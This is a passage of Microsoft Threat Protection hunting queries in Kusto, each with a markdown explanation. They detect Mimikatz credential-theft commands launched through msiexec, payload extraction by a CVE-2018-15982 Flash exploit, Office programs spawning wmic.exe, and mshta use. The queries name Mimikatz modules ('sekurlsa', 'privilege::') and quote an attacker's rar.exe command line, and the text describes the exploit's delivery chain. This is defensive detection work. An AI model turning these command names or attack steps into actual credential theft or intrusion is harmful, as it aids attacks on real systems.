//Looking for PowerShell | where FileName =~ "powershell.exe" //Looking for %temp% in the command line indicating deployment and ProcessCommandLine contains "%temp%"//Find credential theft attempts using Msiexec to run Mimikatz commands DeviceProcessEvents | where Timestamp > ago(7d) | where InitiatingProcessFileName =~ "msiexec.exe" //Mimikatz commands and (ProcessCommandLine contains "privilege::" or ProcessCommandLine has "sekurlsa" or ProcessCommandLine contains "token::") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | v | | | Defense evasion | | | | Credential Access | v | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Execution/detect-malicious-rar-extraction.md ================================================ # Detect CVE-2018-15982 exploit used to extract file from malicious RAR archive This query was originally published in the threat analytics report, *CVE-2018-15982 exploit attacks*. [CVE-2018-15982](https://nvd.nist.gov/vuln/detail/CVE-2018-15982) is an exploit of Adobe Flash Player, that allows for remote execution of arbitrary code. It has since been [patched](https://helpx.adobe.com/security/products/flash-player/apsb18-42.html). Actors have been observed using this vulnerability in targeted attacks. Exploits for CVE-2018-15982 have also been included in several exploit kits. In some initial attacks exploiting CVE-2018-15982, attackers sent targets spear-phishing emails. The emails would include an attached RAR archive, which contained a lure document, as well as a second archive disguised as a *.jpg* file. Opening the document would automatically run an embedded Flash ActiveX control. This, in turn, would call a script containing the exploit. The exploit's ability to run arbitrary code would be employed to unpack and run a payload from the second archive. The payload is a backdoor used both to achieve persistance and for command and control. The following query detects possible instances of a payload being extracted by the exploit. ## Query ```Kusto DeviceProcessEvents | where FileName == "cmd.exe" | where ProcessCommandLine contains @"set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR;" | where ProcessCommandLine contains @"cd /d %~dp0 & rar.exe e -o+ -r -inul*.rar" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | v | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Contributor: Microsoft Threat Protection team ================================================ FILE: Execution/detect-office-products-spawning-wmic.md ================================================ # Detect Office products launching wmic.exe This query was originally published in the threat analytics report, *Ursnif (Gozi) continues to evolve*. [Windows Management Instrumentation](https://docs.microsoft.com/windows/win32/wmisdk/about-wmi), or *WMI*, is a legitimate Microsoft framework used to obtain management data and perform administrative tasks on remote devices. However, attackers can also use WMI to gather information about a target or hijack control of a device. The MITRE ATT&CK framework includes [WMI](https://attack.mitre.org/techniques/T1047/) among its list of common enterprise attack techniques. The following query detects when Microsoft Office software spawns an instance of the WMI command-line utility, *[wmic.exe](https://docs.microsoft.com/windows/win32/wmisdk/wmic)*. ## Query ```Kusto ​​// Office products spawning WMI DeviceProcessEvents | where InitiatingProcessFileName in~ ("winword.exe", "excel.exe", "outlook.exe") and FileName =~"wmic.exe" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | v | The query will detect whenever a Microsoft Office product spawns an instance of wmic.exe. This sort of activity, although suspicious, is not by itself actively harmful. Administrators should investigate further to determine if the event was malicious. | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Execution/detect-suspicious-mshta-usage.md ================================================ # Detect suspicious Mshta usage This query was originally published in the threat analytics report, *Ursnif (Gozi) continues to evolve*. [Microsoft HTML Applications](https://docs.microsoft.com/previous-versions/ms536496(v=vs.85)), or *HTAs*, are executable files that use the same technologies and models as Internet Explorer, but do not run inside of a web browser. *[Mshta.exe](https://docs.microsoft.com/en-us/previous-versions/windows/embedded/aa940701(v%3dwinembedded.5))* is a Windows utility that provides a host for HTA files to run in. Although it has legitimate uses, attackers can use mshta.exe to run malicious Javascript or VBScript commands. The MITRE ATT&CK framework includes [Mshta](https://attack.mitre.org/techniques/T1170/) among its list of enterprise attack techniques. The following query detects when mshta.exe has been run, which might include illegitimate usage by attackers. ## Query ```Kusto // mshta.exe script launching processes DeviceProcessEvents | where Timestamp > ago(7d) and InitiatingProcessFileName =~ 'mshta.exe' and InitiatingProcessCommandLine contains '